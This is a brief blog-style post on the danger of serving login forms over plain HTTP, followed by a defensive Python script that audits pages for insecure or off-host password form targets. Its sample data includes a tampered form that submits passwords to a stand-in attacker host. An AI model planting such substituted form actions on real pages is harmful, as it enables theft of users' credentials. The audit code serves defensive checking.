Taciturn


Transmitting passwords over HTTPS is safe, but serving the login form over HTTP is not. The attack vector is that an active attacker, who can alter the unencrypted page in transit, can substitute a login form with a different submission address, so that users' passwords are sent to a server of the attacker's choosing and compromised.

I noticed this when using the Debian mentors login. Fortunately the login page is also available over HTTPS if you adjust the URI yourself, but ideally it would be the default.
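The check described above can be automated. The following is an added example, not code from the original post or from the Debian mentors site: it parses a page for forms containing a password field and reports the two conditions that matter here, a page fetched over plain HTTP (so the form can be rewritten in transit) and a form action that resolves to a non-HTTPS URL or to a host other than the page's own. The sample page URLs and HTML at the bottom are constructed for illustration.

```python
"""Audit a login page for the mixed-scheme pitfall: HTTPS form submission
served from an HTTP page.

Added example (not from the original post). Only the standard library is used.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _LoginFormFinder(HTMLParser):
    """Collect (action, has_password_field) for every <form> in a document."""

    def __init__(self):
        super().__init__()
        self.forms = []        # completed forms: list of (action, has_password)
        self._current = None   # form being parsed: [action, has_password]

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = [attrs.get("action") or "", False]
        elif tag == "input" and self._current is not None:
            # <input> without a type attribute defaults to type="text"
            if (attrs.get("type") or "text").lower() == "password":
                self._current[1] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(tuple(self._current))
            self._current = None


def audit_login_page(page_url, html):
    """Return a list of findings (strings); an empty list means nothing was flagged."""
    findings = []
    page = urlsplit(page_url)
    if page.scheme != "https":
        findings.append(
            f"page served over {page.scheme}: an active attacker can modify the form in transit"
        )
    parser = _LoginFormFinder()
    parser.feed(html)
    parser.close()
    for action, has_password in parser.forms:
        if not has_password:
            continue  # not a login form; ignore
        # Resolve relative actions against the page URL, as the browser would.
        target = urlsplit(urljoin(page_url, action))
        if target.scheme != "https":
            findings.append(f"password form submits over {target.scheme} to {target.geturl()}")
        if target.hostname != page.hostname:
            findings.append(f"password form submits to a different host: {target.hostname}")
    return findings


# Constructed sample pages (hypothetical hosts, not real sites).
SAFE_PAGE = "https://login.example.test/signin"
SAFE_HTML = (
    '<form method="post" action="/signin">'
    '<input name="user"><input type="password" name="pass"></form>'
)

# The situation in the post: the form posts to HTTPS, but the page came over HTTP.
MIXED_PAGE = "http://login.example.test/signin"
MIXED_HTML = (
    '<form method="post" action="https://login.example.test/signin">'
    '<input name="user"><input type="password" name="pass"></form>'
)

# The rewritten form the post warns about: same page URL, substituted action.
TAMPERED_HTML = (
    '<form method="post" action="https://attacker.example.test/collect">'
    '<input name="user"><input type="password" name="pass"></form>'
)

if __name__ == "__main__":
    for label, url, html in (
        ("safe", SAFE_PAGE, SAFE_HTML),
        ("mixed", MIXED_PAGE, MIXED_HTML),
        ("tampered", MIXED_PAGE, TAMPERED_HTML),
    ):
        print(label, audit_login_page(url, html) or ["ok"])
```

Note that the "mixed" case produces exactly one finding, the HTTP page, even though the form itself posts to HTTPS; that single finding is the whole point of the post. Serving the login page over HTTPS (and redirecting HTTP requests to it) is what clears it.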
